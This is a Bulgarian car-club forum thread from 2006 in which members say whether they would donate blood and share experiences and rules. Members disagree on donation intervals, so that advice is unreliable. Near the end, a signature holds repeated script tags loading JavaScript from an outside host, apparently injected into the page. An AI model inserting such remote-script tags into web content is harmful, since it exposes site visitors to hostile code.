Бихте ли дарили кръв?Безвъзмезно!!!
Започната от ENOXELA, 25 май 2006 - 07:33:45
32 мнения по тази тема
Публикувано 25 май 2006 - 07:33
Анкетата се пуска за да провери дали имате желание за дарителска акция на Мерцедес Бенц Клуб България.
Публикувано 25 май 2006 - 10:19
аз дарявам кажи-речи редовно. няколко пъти за хора, които се нуждаят 0операции и т.н.), а последният път просто така. почувствах някакъв обществен дълг
а и след това ти правят изследвания за СПИН, сифилис и хепатити. хубаво е човек да се зиследва за това регулярно (особено ако не е женен и т.н.
а и ти дават един плик с ядене и пиене (който дарява затова е глухпак, ама си е яко после да ядеш шоколади и да знаеш, че си направил нещо хубаво)
П.П. аз не знам дали имам рпаво да даря сега, защото скоро дарявах
а и след това ти правят изследвания за СПИН, сифилис и хепатити. хубаво е човек да се зиследва за това регулярно (особено ако не е женен и т.н.
а и ти дават един плик с ядене и пиене (който дарява затова е глухпак, ама си е яко после да ядеш шоколади и да знаеш, че си направил нещо хубаво)
П.П. аз не знам дали имам рпаво да даря сега, защото скоро дарявах
Публикувано 25 май 2006 - 14:50
Аз оше миналата година исках да дам...ама нямах 18 и не ми разрешиха но тази година като дойдат в даскалото съм първи...
Чувал съм че после някаде около месец се възстановяваш но ще се преживее!
Чувал съм че после някаде около месец се възстановяваш но ще се преживее!
Mercedes-Benz W201
Публикувано 25 май 2006 - 21:31
няма такова нещо. 24 часа трябват на организма да се възстанови количествено и 2 месеца качествено, затова можеш да даряваш веднъж на 2 месеца. аз до сега слава богу никога не съм има проблеми след като даря. ставам и си тръгвам (не трябва да се кара кола 2 часа след това, ноа з веднага се мяткам - ама аз съм и 90 кила все пакЧувал съм че после някаде около месец се възстановяваш но ще се преживее!
ама няма страшно, даже е забавно катос танеш рязко и се чувстваш акто в матрицата...
Публикувано 02 юни 2006 - 14:19
аз никога не бях дарявал и си бях поставил за цел да го направя тази година, но преди около 2 месеца ходих в центъра по хематология и успях.
Дори след 10сет дни могат да ти дадат пълни изследвания на кръвта срещу писмена молба, а ако само отидеш да питаш, срещу лична карта ти казват кръвната група и резус фактор (оказа се, че съм Б отрицателна, по принцип отрицателните били редки) и дали всичко ти е наред - СПИН, Хепатит и тнт.
Дори след 10сет дни могат да ти дадат пълни изследвания на кръвта срещу писмена молба, а ако само отидеш да питаш, срещу лична карта ти казват кръвната група и резус фактор (оказа се, че съм Б отрицателна, по принцип отрицателните били редки) и дали всичко ти е наред - СПИН, Хепатит и тнт.
I expect nothing. I fear no one. I am free.
Публикувано 26 септември 2006 - 08:57
da :FlagMB:
Публикувано 26 септември 2006 - 10:51
Принципно да, не бих отказал, ако ме помолят. Досега не съм давал и бих дал.
Dark Inside The Night
Публикувано 26 септември 2006 - 14:14
Твърдо да.
Правил съм го често, напълно съм съгласен с колегата Фитипалди, няма нищо страшно или вредно. Напротив, счита се за полезно за организма. Само едно уточнение - по правило не можеш да даваш кръв повече от веднъж на 6 месеца, а не на 2. За това попълваш декларация, като отидеш в Кръвния център. Поне така беше до миналата година, през тази не съм дарявал.
Възстановяваш се за няколко часа, като си хапваш шоколадчетата и сокчетата, които ти дават.
Имаш право на 2 дни платен отпуск, който работодателят не може да ти откаже /чл. 157, ал. 1, т. 2 от Кодекса на труда/, ако решиш да го ползваш.
Правил съм го често, напълно съм съгласен с колегата Фитипалди, няма нищо страшно или вредно. Напротив, счита се за полезно за организма. Само едно уточнение - по правило не можеш да даваш кръв повече от веднъж на 6 месеца, а не на 2. За това попълваш декларация, като отидеш в Кръвния център. Поне така беше до миналата година, през тази не съм дарявал.
Възстановяваш се за няколко часа, като си хапваш шоколадчетата и сокчетата, които ти дават.
Имаш право на 2 дни платен отпуск, който работодателят не може да ти откаже /чл. 157, ал. 1, т. 2 от Кодекса на труда/, ако решиш да го ползваш.
Публикувано 26 септември 2006 - 19:08
aми да, бих дарил кръв
:FlagMB:
:FlagMB:
Публикувано 04 октомври 2006 - 21:28
До сега не съм, но бих дал....
Публикувано 28 октомври 2006 - 04:38
да :ok:
Селянин (човек от село) и селянин по душа са две коренно различни неща!
STI Ranger II 9x19
CZ 75 TS .40
Публикувано 12 ноември 2006 - 12:06
Да, а пък и шоколадче ще има
Публикувано 04 декември 2006 - 20:01
дарявал съм само веднъж преди около 10 г. в казармата по спешност за операция. при подобен случай ще го направя пак. но иначе служебно ми е забранено ако проявя самоинициатива
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
2 потребител(и) четат тази тема
0 потребители, 2 гости, 0 анонимни